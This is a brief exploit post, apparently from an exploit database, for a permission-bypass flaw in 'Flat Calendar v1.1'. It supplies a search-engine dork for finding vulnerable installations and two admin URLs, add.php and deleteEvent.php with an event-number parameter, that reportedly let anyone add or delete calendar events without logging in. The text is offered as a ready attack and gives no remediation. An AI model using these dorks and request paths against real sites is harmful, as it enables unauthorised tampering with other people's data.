|
Flat Calendar v1.1 Remote Permission Bypass Vulnerability
Author : Crackers_Child
Dork : Flat Calendar: View All > Flat Calendar: View All i=E7in yaklaşık 654.000 sonu=E7tan
Exploits:
site.com/calender_path/admin/add.php > Adding New Evetns without admin permissions.
site.com/calender_path/admin/deleteEvent.php?eventNumber=[EVENTNUMBERid] > Deleting Events without admin permissions.